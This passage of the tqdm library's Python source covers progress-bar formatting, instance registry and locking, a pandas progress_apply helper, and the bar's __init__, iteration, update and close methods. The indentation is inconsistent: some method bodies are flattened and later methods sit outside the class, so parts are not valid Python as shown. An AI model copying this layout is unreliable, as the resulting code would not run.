            The expected total number of iterations. If meaningless (None),
            only basic progress statistics are displayed (no ETA).
        elapsed  : float
            Number of seconds passed since start.
        ncols  : int, optional
            The width of the entire output message. If specified,
            dynamically resizes `{bar}` to stay within this bound
            [default: None]. If `0`, will not print any bar (only stats).
            The fallback is `{bar:10}`.
        prefix  : str, optional
            Prefix message (included in total width) [default: ''].
            Use as {desc} in bar_format string.
        ascii  : bool, optional or str, optional
            If not set, use unicode (smooth blocks) to fill the meter
            [default: False]. The fallback is to use ASCII characters
            " 123456789#".
        unit  : str, optional
            The iteration unit [default: 'it'].
        unit_scale  : bool or int or float, optional
            If 1 or True, the number of iterations will be printed with an
            appropriate SI metric prefix (k = 10^3, M = 10^6, etc.)
            [default: False]. If any other non-zero number, will scale
            `total` and `n`.
        rate  : float, optional
            Manual override for iteration rate.
            If [default: None], uses n/elapsed.
        bar_format  : str, optional
            Specify a custom bar string formatting. May impact performance.
            [default: '{l_bar}{bar}{r_bar}'], where
            l_bar='{desc}: {percentage:3.0f}%|' and
            r_bar='| {n_fmt}/{total_fmt} [{elapsed}<{remaining}, '
            '{rate_fmt}{postfix}]'
            Possible vars: l_bar, bar, r_bar, n, n_fmt, total, total_fmt,
            percentage, elapsed, elapsed_s, ncols, desc, unit,
            rate, rate_fmt, rate_noinv, rate_noinv_fmt,
            rate_inv, rate_inv_fmt, postfix, unit_divisor,
            remaining, remaining_s.
            Note that a trailing ": " is automatically removed after {desc}
            if the latter is empty.
        postfix  : *, optional
            Similar to `prefix`, but placed at the end
            (e.g. for additional stats).
            Note: postfix is usually a string (not a dict) for this method,
            and will if possible be set to postfix = ', ' + postfix.
            However other types are supported (#382).
        unit_divisor  : float, optional
            [default: 1000], ignored unless `unit_scale` is True.

        Returns
        -------
        out  : Formatted meter and stats, ready to display.
        """
        # sanity check: total
        if total and n >= (total + 0.5):  # allow float imprecision (#849)
            total = None

        # apply custom scale if necessary
        if unit_scale and unit_scale not in (True, 1):
            if total:
                total *= unit_scale
            n *= unit_scale
            if rate:
                rate *= unit_scale  # by default rate = 1 / self.avg_time
            unit_scale = False

        elapsed_str = tqdm.format_interval(elapsed)

        # if unspecified, attempt to use rate = average speed
        # (we allow manual override since predicting time is an arcane art)
        if rate is None and elapsed:
            rate = n / elapsed
        inv_rate = 1 / rate if rate else None
        format_sizeof = tqdm.format_sizeof
        rate_noinv_fmt = ((format_sizeof(rate) if unit_scale else
                           '{0:5.2f}'.format(rate))
                          if rate else '?') + unit + '/s'
        rate_inv_fmt = ((format_sizeof(inv_rate) if unit_scale else
                         '{0:5.2f}'.format(inv_rate))
                        if inv_rate else '?') + 's/' + unit
        # Display seconds-per-item when slower than one item per second.
        rate_fmt = rate_inv_fmt if inv_rate and inv_rate > 1 else rate_noinv_fmt

        if unit_scale:
            n_fmt = format_sizeof(n, divisor=unit_divisor)
            total_fmt = format_sizeof(total, divisor=unit_divisor) \
                if total is not None else '?'
        else:
            n_fmt = str(n)
            total_fmt = str(total) if total is not None else '?'

        try:
            postfix = ', ' + postfix if postfix else ''
        except TypeError:
            # non-string postfix (#382): pass it through unchanged
            pass

        remaining = (total - n) / rate if rate and total else 0
        remaining_str = tqdm.format_interval(remaining) if rate else '?'

        # format the stats displayed to the left and right sides of the bar
        if prefix:
            # old prefix setup work around
            bool_prefix_colon_already = (prefix[-2:] == ": ")
            l_bar = prefix if bool_prefix_colon_already else prefix + ": "
        else:
            l_bar = ''

        r_bar = '| {0}/{1} [{2}<{3}, {4}{5}]'.format(
            n_fmt, total_fmt, elapsed_str, remaining_str, rate_fmt, postfix)

        # Custom bar formatting
        # Populate a dict with all available progress indicators
        format_dict = dict(
            # slight extension of self.format_dict
            n=n, n_fmt=n_fmt, total=total, total_fmt=total_fmt,
            elapsed=elapsed_str, elapsed_s=elapsed,
            ncols=ncols, desc=prefix or '', unit=unit,
            rate=inv_rate if inv_rate and inv_rate > 1 else rate,
            rate_fmt=rate_fmt, rate_noinv=rate,
            rate_noinv_fmt=rate_noinv_fmt, rate_inv=inv_rate,
            rate_inv_fmt=rate_inv_fmt,
            postfix=postfix, unit_divisor=unit_divisor,
            # plus more useful definitions
            remaining=remaining_str, remaining_s=remaining,
            l_bar=l_bar, r_bar=r_bar,
            **extra_kwargs)

        # total is known: we can predict some stats
        if total:
            # fractional and percentage progress
            frac = n / total
            percentage = frac * 100

            l_bar += '{0:3.0f}%|'.format(percentage)

            # ncols == 0 means "stats only, no bar".
            if ncols == 0:
                return l_bar[:-1] + r_bar[1:]

            format_dict.update(l_bar=l_bar)
            if bar_format:
                format_dict.update(percentage=percentage)

                # auto-remove colon for empty `desc`
                if not prefix:
                    bar_format = bar_format.replace("{desc}: ", '')
            else:
                bar_format = "{l_bar}{bar}{r_bar}"

            # First format with a placeholder {bar} to measure remaining width.
            full_bar = FormatReplace()
            try:
                nobar = bar_format.format(bar=full_bar, **format_dict)
            except UnicodeEncodeError:
                bar_format = _unicode(bar_format)
                nobar = bar_format.format(bar=full_bar, **format_dict)
            if not full_bar.format_called:
                # no {bar}, we can just format and return
                return nobar

            # Formatting progress bar space available for bar's display
            full_bar = Bar(
                frac,
                max(1, ncols - _text_width(RE_ANSI.sub('', nobar)))
                if ncols else 10,
                charset=Bar.ASCII if ascii is True else ascii or Bar.UTF)
            if not _is_ascii(full_bar.charset) and _is_ascii(bar_format):
                bar_format = _unicode(bar_format)

            return bar_format.format(bar=full_bar, **format_dict)

        elif bar_format:
            # user-specified bar_format but no total
            l_bar += '|'
            format_dict.update(l_bar=l_bar, percentage=0)
            full_bar = FormatReplace()
            nobar = bar_format.format(bar=full_bar, **format_dict)
            if not full_bar.format_called:
                return nobar
            # Unknown progress: render a blank bar in the available space.
            full_bar = Bar(
                0,
                max(1, ncols - _text_width(RE_ANSI.sub('', nobar)))
                if ncols else 10,
                charset=Bar.BLANK)
            return bar_format.format(bar=full_bar, **format_dict)
        else:
            # no total: no progressbar, ETA, just progress stats
            return ((prefix + ": ") if prefix else '') + \
                '{0}{1} [{2}, {3}{4}]'.format(
                    n_fmt, unit, elapsed_str, rate_fmt, postfix)
    def __new__(cls, *args, **kwargs):
        """Register the new bar in the class-level registry (a WeakSet, so
        closed bars can be garbage-collected) and ensure the monitor
        thread is running — all under the global lock."""
        # Create a new instance
        instance = object.__new__(cls)
        # Construct the lock if it does not exist
        with cls.get_lock():
            # Add to the list of instances
            if not hasattr(cls, '_instances'):
                cls._instances = WeakSet()
            cls._instances.add(instance)
            # Create the monitoring thread
            if cls.monitor_interval and (cls.monitor is None or not
                                         cls.monitor.report()):
                try:
                    cls.monitor = TMonitor(cls, cls.monitor_interval)
                except Exception as e:  # pragma: nocover
                    # Monitoring is best-effort: warn and disable on failure.
                    warn("tqdm:disabling monitor support"
                         " (monitor_interval = 0) due to:\n" + str(e),
                         TqdmMonitorWarning, stacklevel=2)
                    cls.monitor_interval = 0
        # Return the instance
        return instance
@classmethod
def _get_free_pos(cls, instance=None):
"""Skips specified instance."""
positions = set(abs(inst.pos) for inst in cls._instances
if inst is not instance and hasattr(inst, "pos"))
return min(set(range(len(positions) + 1)).difference(positions))
    @classmethod
    def _decr_instances(cls, instance):
        """
        Remove from list and reposition other bars
        so that newer bars won't overlap previous bars
        """
        with cls._lock:
            try:
                cls._instances.remove(instance)
            except KeyError:
                # if not instance.gui:  # pragma: no cover
                #     raise
                pass  # py2: maybe magically removed already
            # else:
            if not instance.gui:
                # Shift every bar positioned below the removed one up a row.
                for inst in cls._instances:
                    # negative `pos` means fixed
                    if hasattr(inst, "pos") and inst.pos > abs(instance.pos):
                        inst.clear(nolock=True)
                        inst.pos -= 1
                        # TODO: check this doesn't overwrite another fixed bar
            # Kill monitor if no instances are left
            if not cls._instances and cls.monitor:
                try:
                    cls.monitor.exit()
                    del cls.monitor
                except AttributeError:  # pragma: nocover
                    pass
                else:
                    cls.monitor = None
@classmethod
def write(cls, s, file=None, end="\n", nolock=False):
"""Print a message via tqdm (without overlap with bars)."""
fp = file if file is not None else sys.stdout
with cls.external_write_mode(file=file, nolock=nolock):
# Write the message
fp.write(s)
fp.write(end)
    @classmethod
    @contextmanager
    def external_write_mode(cls, file=None, nolock=False):
        """
        Disable tqdm within context and refresh tqdm when exits.
        Useful when writing to standard output stream
        """
        fp = file if file is not None else sys.stdout

        if not nolock:
            cls.get_lock().acquire()
        # Clear all bars
        inst_cleared = []
        for inst in getattr(cls, '_instances', []):
            # Clear instance if in the target output file
            # or if write output + tqdm output are both either
            # sys.stdout or sys.stderr (because both are mixed in terminal)
            if hasattr(inst, "start_t") and (inst.fp == fp or all(
                    f in (sys.stdout, sys.stderr) for f in (fp, inst.fp))):
                inst.clear(nolock=True)
                inst_cleared.append(inst)
        # Caller's `with` body runs here, on a clean line.
        yield
        # Force refresh display of bars we cleared
        for inst in inst_cleared:
            inst.refresh(nolock=True)
        if not nolock:
            cls._lock.release()
    @classmethod
    def set_lock(cls, lock):
        """Set the global lock shared by all bars (e.g. a lock supplied by a
        parent process on platforms without fork)."""
        cls._lock = lock
    @classmethod
    def get_lock(cls):
        """Get the global lock. Construct it if it does not exist."""
        # Lazily created so merely importing tqdm does not touch the
        # multiprocessing machinery (see module-level comment above).
        if not hasattr(cls, '_lock'):
            cls._lock = TqdmDefaultWriteLock()
        return cls._lock
    @classmethod
    def pandas(tclass, *targs, **tkwargs):
        """
        Registers the given `tqdm` class with
        pandas.core.
        ( frame.DataFrame
        | series.Series
        | groupby.(generic.)DataFrameGroupBy
        | groupby.(generic.)SeriesGroupBy
        ).progress_apply
        A new instance will be create every time `progress_apply` is called,
        and each instance will automatically close() upon completion.

        Parameters
        ----------
        targs, tkwargs  : arguments for the tqdm instance

        Examples
        --------
        >>> import pandas as pd
        >>> import numpy as np
        >>> from tqdm import tqdm
        >>> from tqdm.gui import tqdm as tqdm_gui
        >>>
        >>> df = pd.DataFrame(np.random.randint(0, 100, (100000, 6)))
        >>> tqdm.pandas(ncols=50)  # can use tqdm_gui, optional kwargs, etc
        >>> # Now you can use `progress_apply` instead of `apply`
        >>> df.groupby(0).progress_apply(lambda x: x**2)

        References
        ----------
        https://stackoverflow.com/questions/18603270/
        progress-indicator-during-pandas-operations-python
        """
        from pandas.core.frame import DataFrame
        from pandas.core.series import Series
        # The imports below chase pandas-internal reorganisations across
        # versions; each try/except targets the version range noted.
        try:
            from pandas import Panel
        except ImportError:  # TODO: pandas>0.25.2
            Panel = None
        try:  # pandas>=0.18.0
            from pandas.core.window import _Rolling_and_Expanding
        except ImportError:  # pragma: no cover
            _Rolling_and_Expanding = None
        try:  # pandas>=0.25.0
            from pandas.core.groupby.generic import DataFrameGroupBy, \
                SeriesGroupBy  # , NDFrameGroupBy
        except ImportError:
            try:  # pandas>=0.23.0
                from pandas.core.groupby.groupby import DataFrameGroupBy, \
                    SeriesGroupBy
            except ImportError:
                from pandas.core.groupby import DataFrameGroupBy, \
                    SeriesGroupBy
        try:  # pandas>=0.23.0
            from pandas.core.groupby.groupby import GroupBy
        except ImportError:
            from pandas.core.groupby import GroupBy
        try:  # pandas>=0.23.0
            from pandas.core.groupby.groupby import PanelGroupBy
        except ImportError:
            try:
                from pandas.core.groupby import PanelGroupBy
            except ImportError:  # pandas>=0.25.0
                PanelGroupBy = None

        # One-element list: a mutable cell so `inner` can consume a
        # deprecated pre-built bar exactly once.
        deprecated_t = [tkwargs.pop('deprecated_t', None)]

        def inner_generator(df_function='apply'):
            # Build a progress_* method that forwards to `df.<df_function>`.
            def inner(df, func, *args, **kwargs):
                """
                Parameters
                ----------
                df  : (DataFrame|Series)[GroupBy]
                    Data (may be grouped).
                func  : function
                    To be applied on the (grouped) data.
                **kwargs  : optional
                    Transmitted to `df.apply()`.
                """
                # Precompute total iterations
                total = tkwargs.pop("total", getattr(df, 'ngroups', None))
                if total is None:  # not grouped
                    if df_function == 'applymap':
                        total = df.size
                    elif isinstance(df, Series):
                        total = len(df)
                    elif _Rolling_and_Expanding is None or \
                            not isinstance(df, _Rolling_and_Expanding):
                        # DataFrame or Panel
                        axis = kwargs.get('axis', 0)
                        if axis == 'index':
                            axis = 0
                        elif axis == 'columns':
                            axis = 1
                        # when axis=0, total is shape[axis1]
                        total = df.size // df.shape[axis]

                # Init bar
                if deprecated_t[0] is not None:
                    t = deprecated_t[0]
                    deprecated_t[0] = None
                else:
                    t = tclass(*targs, total=total, **tkwargs)

                if len(args) > 0:
                    # *args intentionally not supported (see #244, #299)
                    TqdmDeprecationWarning(
                        "Except func, normal arguments are intentionally" +
                        " not supported by" +
                        " `(DataFrame|Series|GroupBy).progress_apply`." +
                        " Use keyword arguments instead.",
                        fp_write=getattr(t.fp, 'write', sys.stderr.write))

                try:
                    func = df._is_builtin_func(func)
                except TypeError:
                    pass

                # Define bar updating wrapper
                def wrapper(*args, **kwargs):
                    # update tbar correctly
                    # it seems `pandas apply` calls `func` twice
                    # on the first column/row to decide whether it can
                    # take a fast or slow code path; so stop when t.total==t.n
                    t.update(n=1 if not t.total or t.n < t.total else 0)
                    return func(*args, **kwargs)

                # Apply the provided function (in **kwargs)
                # on the df using our wrapper (which provides bar updating)
                result = getattr(df, df_function)(wrapper, **kwargs)

                # Close bar and return pandas calculation result
                t.close()
                return result
            return inner

        # Monkeypatch pandas to provide easy methods
        # Enable custom tqdm progress in pandas!
        Series.progress_apply = inner_generator()
        SeriesGroupBy.progress_apply = inner_generator()
        Series.progress_map = inner_generator('map')
        SeriesGroupBy.progress_map = inner_generator('map')

        DataFrame.progress_apply = inner_generator()
        DataFrameGroupBy.progress_apply = inner_generator()
        DataFrame.progress_applymap = inner_generator('applymap')

        if Panel is not None:
            Panel.progress_apply = inner_generator()
        if PanelGroupBy is not None:
            PanelGroupBy.progress_apply = inner_generator()

        GroupBy.progress_apply = inner_generator()
        GroupBy.progress_aggregate = inner_generator('aggregate')
        GroupBy.progress_transform = inner_generator('transform')

        if _Rolling_and_Expanding is not None:  # pragma: no cover
            _Rolling_and_Expanding.progress_apply = inner_generator()
def __init__(self, iterable=None, desc=None, total=None, leave=True,
             file=None, ncols=None, mininterval=0.1, maxinterval=10.0,
             miniters=None, ascii=None, disable=False, unit='it',
             unit_scale=False, dynamic_ncols=False, smoothing=0.3,
             bar_format=None, initial=0, position=None, postfix=None,
             unit_divisor=1000, write_bytes=None, lock_args=None,
             gui=False, **kwargs):
    """
    Parameters
    ----------
    iterable  : iterable, optional
        Iterable to decorate with a progressbar.
        Leave blank to manually manage the updates.
    desc  : str, optional
        Prefix for the progressbar.
    total  : int or float, optional
        The number of expected iterations. If unspecified,
        len(iterable) is used if possible. If float("inf") or as a last
        resort, only basic progress statistics are displayed
        (no ETA, no progressbar).
        If `gui` is True and this parameter needs subsequent updating,
        specify an initial arbitrary large positive number,
        e.g. 9e9.
    leave  : bool, optional
        If [default: True], keeps all traces of the progressbar
        upon termination of iteration.
        If `None`, will leave only if `position` is `0`.
    file  : `io.TextIOWrapper` or `io.StringIO`, optional
        Specifies where to output the progress messages
        (default: sys.stderr). Uses `file.write(str)` and `file.flush()`
        methods.  For encoding, see `write_bytes`.
    ncols  : int, optional
        The width of the entire output message. If specified,
        dynamically resizes the progressbar to stay within this bound.
        If unspecified, attempts to use environment width. The
        fallback is a meter width of 10 and no limit for the counter and
        statistics. If 0, will not print any meter (only stats).
    mininterval  : float, optional
        Minimum progress display update interval [default: 0.1] seconds.
    maxinterval  : float, optional
        Maximum progress display update interval [default: 10] seconds.
        Automatically adjusts `miniters` to correspond to `mininterval`
        after long display update lag. Only works if `dynamic_miniters`
        or monitor thread is enabled.
    miniters  : int or float, optional
        Minimum progress display update interval, in iterations.
        If 0 and `dynamic_miniters`, will automatically adjust to equal
        `mininterval` (more CPU efficient, good for tight loops).
        If > 0, will skip display of specified number of iterations.
        Tweak this and `mininterval` to get very efficient loops.
        If your progress is erratic with both fast and slow iterations
        (network, skipping items, etc) you should set miniters=1.
    ascii  : bool or str, optional
        If unspecified or False, use unicode (smooth blocks) to fill
        the meter. The fallback is to use ASCII characters " 123456789#".
    disable  : bool, optional
        Whether to disable the entire progressbar wrapper
        [default: False]. If set to None, disable on non-TTY.
    unit  : str, optional
        String that will be used to define the unit of each iteration
        [default: it].
    unit_scale  : bool or int or float, optional
        If 1 or True, the number of iterations will be reduced/scaled
        automatically and a metric prefix following the
        International System of Units standard will be added
        (kilo, mega, etc.) [default: False]. If any other non-zero
        number, will scale `total` and `n`.
    dynamic_ncols  : bool, optional
        If set, constantly alters `ncols` to the environment (allowing
        for window resizes) [default: False].
    smoothing  : float, optional
        Exponential moving average smoothing factor for speed estimates
        (ignored in GUI mode). Ranges from 0 (average speed) to 1
        (current/instantaneous speed) [default: 0.3].
    bar_format  : str, optional
        Specify a custom bar string formatting. May impact performance.
        [default: '{l_bar}{bar}{r_bar}'], where
        l_bar='{desc}: {percentage:3.0f}%|' and
        r_bar='| {n_fmt}/{total_fmt} [{elapsed}<{remaining}, '
          '{rate_fmt}{postfix}]'
        Possible vars: l_bar, bar, r_bar, n, n_fmt, total, total_fmt,
          percentage, elapsed, elapsed_s, ncols, desc, unit,
          rate, rate_fmt, rate_noinv, rate_noinv_fmt,
          rate_inv, rate_inv_fmt, postfix, unit_divisor,
          remaining, remaining_s.
        Note that a trailing ": " is automatically removed after {desc}
        if the latter is empty.
    initial  : int or float, optional
        The initial counter value. Useful when restarting a progress
        bar [default: 0]. If using float, consider specifying `{n:.3f}`
        or similar in `bar_format`, or specifying `unit_scale`.
    position  : int, optional
        Specify the line offset to print this bar (starting from 0)
        Automatic if unspecified.
        Useful to manage multiple bars at once (eg, from threads).
    postfix  : dict or *, optional
        Specify additional stats to display at the end of the bar.
        Calls `set_postfix(**postfix)` if possible (dict).
    unit_divisor  : float, optional
        [default: 1000], ignored unless `unit_scale` is True.
    write_bytes  : bool, optional
        If (default: None) and `file` is unspecified,
        bytes will be written in Python 2. If `True` will also write
        bytes. In all other cases will default to unicode.
    lock_args  : tuple, optional
        Passed to `refresh` for intermediate output
        (initialisation, iterating, and updating).
    gui  : bool, optional
        WARNING: internal parameter - do not use.
        Use tqdm.gui.tqdm(...) instead. If set, will attempt to use
        matplotlib animations for a graphical output [default: False].

    Returns
    -------
    out  : decorated iterator.
    """
    if write_bytes is None:
        # py2-only default: raw byte streams when writing to stderr
        write_bytes = file is None and sys.version_info < (3,)

    if file is None:
        file = sys.stderr

    if write_bytes:
        # Despite coercing unicode into bytes, py2 sys.std* streams
        # should have bytes written to them.
        file = SimpleTextIOWrapper(
            file, encoding=getattr(file, 'encoding', None) or 'utf-8')

    if disable is None and hasattr(file, "isatty") and not file.isatty():
        disable = True

    if total is None and iterable is not None:
        try:
            total = len(iterable)
        except (TypeError, AttributeError):
            total = None
    if total == float("inf"):
        # Infinite iterations, behave same as unknown
        total = None

    if disable:
        # Disabled bars still register/unregister in the instance set so
        # position bookkeeping for other bars stays consistent.
        self.iterable = iterable
        self.disable = disable
        with self._lock:
            self.pos = self._get_free_pos(self)
            self._instances.remove(self)
        self.n = initial
        self.total = total
        return

    if kwargs:
        # Unknown kwargs are a hard error (except the deprecated `nested`).
        self.disable = True
        with self._lock:
            self.pos = self._get_free_pos(self)
            self._instances.remove(self)
        raise (
            TqdmDeprecationWarning(
                "`nested` is deprecated and automated.\n"
                "Use `position` instead for manual control.\n",
                fp_write=getattr(file, 'write', sys.stderr.write))
            if "nested" in kwargs else
            TqdmKeyError("Unknown argument(s): " + str(kwargs)))

    # Preprocess the arguments
    if ((ncols is None) and (file in (sys.stderr, sys.stdout))) or \
            dynamic_ncols:  # pragma: no cover
        if dynamic_ncols:
            dynamic_ncols = _environ_cols_wrapper()
            if dynamic_ncols:
                ncols = dynamic_ncols(file)
        else:
            _dynamic_ncols = _environ_cols_wrapper()
            if _dynamic_ncols:
                ncols = _dynamic_ncols(file)

    if miniters is None:
        miniters = 0
        dynamic_miniters = True
    else:
        dynamic_miniters = False

    if mininterval is None:
        mininterval = 0

    if maxinterval is None:
        maxinterval = 0

    if ascii is None:
        ascii = not _supports_unicode(file)

    if bar_format and not ((ascii is True) or _is_ascii(ascii)):
        # Convert bar format into unicode since terminal uses unicode
        bar_format = _unicode(bar_format)

    if smoothing is None:
        smoothing = 0

    # Store the arguments
    self.iterable = iterable
    self.desc = desc or ''
    self.total = total
    self.leave = leave
    self.fp = file
    self.ncols = ncols
    self.mininterval = mininterval
    self.maxinterval = maxinterval
    self.miniters = miniters
    self.dynamic_miniters = dynamic_miniters
    self.ascii = ascii
    self.disable = disable
    self.unit = unit
    self.unit_scale = unit_scale
    self.unit_divisor = unit_divisor
    self.lock_args = lock_args
    self.gui = gui
    self.dynamic_ncols = dynamic_ncols
    self.smoothing = smoothing
    self.avg_time = None
    self._time = time
    self.bar_format = bar_format
    self.postfix = None
    if postfix:
        try:
            self.set_postfix(refresh=False, **postfix)
        except TypeError:
            # postfix was not a mapping; store it verbatim
            self.postfix = postfix

    # Init the iterations counters
    self.last_print_n = initial
    self.n = initial

    # if nested, at initial sp() call we replace '\r' by '\n' to
    # not overwrite the outer progress bar
    with self._lock:
        if position is None:
            self.pos = self._get_free_pos(self)
        else:  # mark fixed positions as negative
            self.pos = -position

        if not gui:
            # Initialize the screen printer
            self.sp = self.status_printer(self.fp)
            self.refresh(lock_args=self.lock_args)

    # Init the time counter
    self.last_print_t = self._time()
    # NB: Avoid race conditions by setting start_t at the very end of init
    self.start_t = self.last_print_t
def __bool__(self):
    """Truthiness: positive ``total`` when known, else truthiness of the iterable."""
    total = self.total
    if total is not None:
        return total > 0
    it = self.iterable
    if it is None:
        raise TypeError('bool() undefined when iterable == total == None')
    return bool(it)
def __nonzero__(self):
    # Python 2 truth-value hook: delegate to the Python 3 __bool__.
    return self.__bool__()
def __len__(self):
    """Length: shape/len of the wrapped iterable when available, else ``total``."""
    it = self.iterable
    if it is None:
        return self.total
    if hasattr(it, "shape"):
        return it.shape[0]
    if hasattr(it, "__len__"):
        return len(it)
    return getattr(self, "total", None)
def __enter__(self):
    # Context-manager entry: the bar object itself is the managed resource.
    return self
def __exit__(self, exc_type, exc_value, traceback):
    # Context-manager exit: close the bar, tolerating partially torn-down
    # state when an exception is already propagating.
    try:
        self.close()
    except AttributeError:
        # maybe eager thread cleanup upon external error
        if (exc_type, exc_value, traceback) == (None, None, None):
            raise
        warn("AttributeError ignored", TqdmWarning, stacklevel=2)
def __del__(self):
    # Best-effort cleanup when the bar is garbage-collected without close().
    self.close()
def __repr__(self):
    # Render the current meter string from a snapshot of the bar state.
    return self.format_meter(**self.format_dict)
@property
def _comparable(self):
    # Sort key for ordering bars by screen position; instances without a
    # `pos` yet sort last (1 << 31 sentinel).
    return abs(getattr(self, "pos", 1 << 31))
def __hash__(self):
    # Identity hash: each bar is a distinct member of the instance registry.
    return id(self)
def __iter__(self):
    """Backward-compatibility to use: for x in tqdm(iterable)"""
    # Inlining instance variables as locals (speed optimisation)
    iterable = self.iterable

    # If the bar is disabled, then just walk the iterable
    # (note: keep this check outside the loop for performance)
    if self.disable:
        for obj in iterable:
            yield obj
        return

    mininterval = self.mininterval
    maxinterval = self.maxinterval
    miniters = self.miniters
    dynamic_miniters = self.dynamic_miniters
    last_print_t = self.last_print_t
    last_print_n = self.last_print_n
    n = self.n
    smoothing = self.smoothing
    avg_time = self.avg_time
    time = self._time

    # gui=True instances have no `sp` printer: direct users to tqdm.gui.
    if not hasattr(self, 'sp'):
        raise TqdmDeprecationWarning(
            "Please use `tqdm.gui.tqdm(...)` instead of"
            " `tqdm(..., gui=True)`\n",
            fp_write=getattr(self.fp, 'write', sys.stderr.write))

    for obj in iterable:
        yield obj
        # Update and possibly print the progressbar.
        # Note: does not call self.update(1) for speed optimisation.
        n += 1
        # check counter first to avoid calls to time()
        if n - last_print_n >= self.miniters:
            miniters = self.miniters  # watch monitoring thread changes
            delta_t = time() - last_print_t
            if delta_t >= mininterval:
                cur_t = time()
                delta_it = n - last_print_n
                # EMA (not just overall average)
                if smoothing and delta_t and delta_it:
                    rate = delta_t / delta_it
                    avg_time = self.ema(rate, avg_time, smoothing)
                    self.avg_time = avg_time

                self.n = n
                self.refresh(lock_args=self.lock_args)

                # If no `miniters` was specified, adjust automatically
                # to the max iteration rate seen so far between 2 prints
                if dynamic_miniters:
                    if maxinterval and delta_t >= maxinterval:
                        # Adjust miniters to time interval by rule of 3
                        if mininterval:
                            # Set miniters to correspond to mininterval
                            miniters = delta_it * mininterval / delta_t
                        else:
                            # Set miniters to correspond to maxinterval
                            miniters = delta_it * maxinterval / delta_t
                    elif smoothing:
                        # EMA-weight miniters to converge
                        # towards the timeframe of mininterval
                        rate = delta_it
                        if mininterval and delta_t:
                            rate *= mininterval / delta_t
                        miniters = self.ema(rate, miniters, smoothing)
                    else:
                        # Maximum nb of iterations between 2 prints
                        miniters = max(miniters, delta_it)

                # Store old values for next call
                self.n = self.last_print_n = last_print_n = n
                self.last_print_t = last_print_t = cur_t
                self.miniters = miniters

    # Closing the progress bar.
    # Update some internal variables for close().
    self.last_print_n = last_print_n
    self.n = n
    self.miniters = miniters
    self.close()
def update(self, n=1):
    """
    Manually update the progress bar, useful for streams
    such as reading files.
    E.g.:
    >>> t = tqdm(total=filesize) # Initialise
    >>> for current_buffer in stream:
    ...    ...
    ...    t.update(len(current_buffer))
    >>> t.close()
    The last line is highly recommended, but possibly not necessary if
    `t.update()` will be called in such a way that `filesize` will be
    exactly reached and printed.

    Parameters
    ----------
    n  : int or float, optional
        Increment to add to the internal counter of iterations
        [default: 1]. If using float, consider specifying `{n:.3f}`
        or similar in `bar_format`, or specifying `unit_scale`.
    """
    # N.B.: see __iter__() for more comments.
    if self.disable:
        return

    if n < 0:
        self.last_print_n += n  # for auto-refresh logic to work
    self.n += n

    # check counter first to reduce calls to time()
    if self.n - self.last_print_n >= self.miniters:
        delta_t = self._time() - self.last_print_t
        if delta_t >= self.mininterval:
            cur_t = self._time()
            delta_it = self.n - self.last_print_n  # >= n
            # elapsed = cur_t - self.start_t
            # EMA (not just overall average)
            if self.smoothing and delta_t and delta_it:
                rate = delta_t / delta_it
                self.avg_time = self.ema(
                    rate, self.avg_time, self.smoothing)

            # gui=True instances have no `sp` printer: direct to tqdm.gui.
            if not hasattr(self, "sp"):
                raise TqdmDeprecationWarning(
                    "Please use `tqdm.gui.tqdm(...)`"
                    " instead of `tqdm(..., gui=True)`\n",
                    fp_write=getattr(self.fp, 'write', sys.stderr.write))
            self.refresh(lock_args=self.lock_args)

            # If no `miniters` was specified, adjust automatically to the
            # maximum iteration rate seen so far between two prints.
            # e.g.: After running `tqdm.update(5)`, subsequent
            # calls to `tqdm.update()` will only cause an update after
            # at least 5 more iterations.
            if self.dynamic_miniters:
                if self.maxinterval and delta_t >= self.maxinterval:
                    if self.mininterval:
                        self.miniters = delta_it * self.mininterval \
                            / delta_t
                    else:
                        self.miniters = delta_it * self.maxinterval \
                            / delta_t
                elif self.smoothing:
                    # EMA miniters update
                    self.miniters = self.smoothing * delta_it * \
                        (self.mininterval / delta_t
                         if self.mininterval and delta_t
                         else 1) + \
                        (1 - self.smoothing) * self.miniters
                else:
                    self.miniters = max(self.miniters, delta_it)

            # Store old values for next call
            self.last_print_n = self.n
            self.last_print_t = cur_t
def close(self):
    """Cleanup and (if leave=False) close the progressbar."""
    if self.disable:
        return

    # Prevent multiple closures
    self.disable = True

    # decrement instance pos and remove from internal set
    pos = abs(self.pos)
    self._decr_instances(self)

    # GUI mode
    if not hasattr(self, "sp"):
        return

    # annoyingly, _supports_unicode isn't good enough
    def fp_write(s):
        self.fp.write(_unicode(s))

    # Probe the stream: a closed file raises ValueError('... closed ...')
    # which we treat as "nothing left to do".
    try:
        fp_write('')
    except ValueError as e:
        if 'closed' in str(e):
            return
        raise  # pragma: no cover

    # leave=None means: keep the bar only if it is the outermost (pos 0)
    leave = pos == 0 if self.leave is None else self.leave

    with self._lock:
        if leave:
            # stats for overall rate (no weighted average)
            self.avg_time = None
            self.display(pos=0)
            fp_write('\n')
        else:
            self.display(msg='', pos=pos)
            if not pos:
                fp_write('\r')
def clear(self, nolock=False):
    """Clear current bar display.

    Parameters
    ----------
    nolock  : bool, optional
        If True, skip acquiring the shared write lock (caller holds it).
    """
    if self.disable:
        return

    if not nolock:
        self._lock.acquire()
    self.moveto(abs(self.pos))
    self.sp('')
    self.fp.write('\r')  # place cursor back at the beginning of line
    self.moveto(-abs(self.pos))
    if not nolock:
        self._lock.release()
def refresh(self, nolock=False, lock_args=None):
    """
    Force refresh the display of this bar.

    Parameters
    ----------
    nolock  : bool, optional
        If `True`, does not lock.
        If [default: `False`]: calls `acquire()` on internal lock.
    lock_args  : tuple, optional
        Passed to internal lock's `acquire()`.
        If specified, will only `display()` if `acquire()` returns `True`.
    """
    if self.disable:
        return

    if not nolock:
        if lock_args:
            # Non-blocking/timed acquire: skip the redraw on failure.
            if not self._lock.acquire(*lock_args):
                return False
        else:
            self._lock.acquire()
    self.display()
    if not nolock:
        self._lock.release()
    return True
def unpause(self):
    """Restart tqdm timer from last print time.

    Shifts ``start_t`` forward by the paused interval so elapsed/rate
    statistics exclude the pause.
    """
    now = self._time()
    self.start_t += now - self.last_print_t
    self.last_print_t = now
def reset(self, total=None):
    """
    Resets to 0 iterations for repeated use.
    Consider combining with `leave=True`.

    Parameters
    ----------
    total  : int or float, optional. Total to use for the new bar.
    """
    self.n = 0
    self.last_print_n = 0
    now = self._time()
    self.start_t = now
    self.last_print_t = now
    if total is not None:
        self.total = total
    self.refresh()
def set_description(self, desc=None, refresh=True):
    """
    Set/modify description of the progress bar (a ": " is appended).

    Parameters
    ----------
    desc  : str, optional
    refresh  : bool, optional
        Forces refresh [default: True].
    """
    if desc:
        self.desc = desc + ': '
    else:
        self.desc = ''
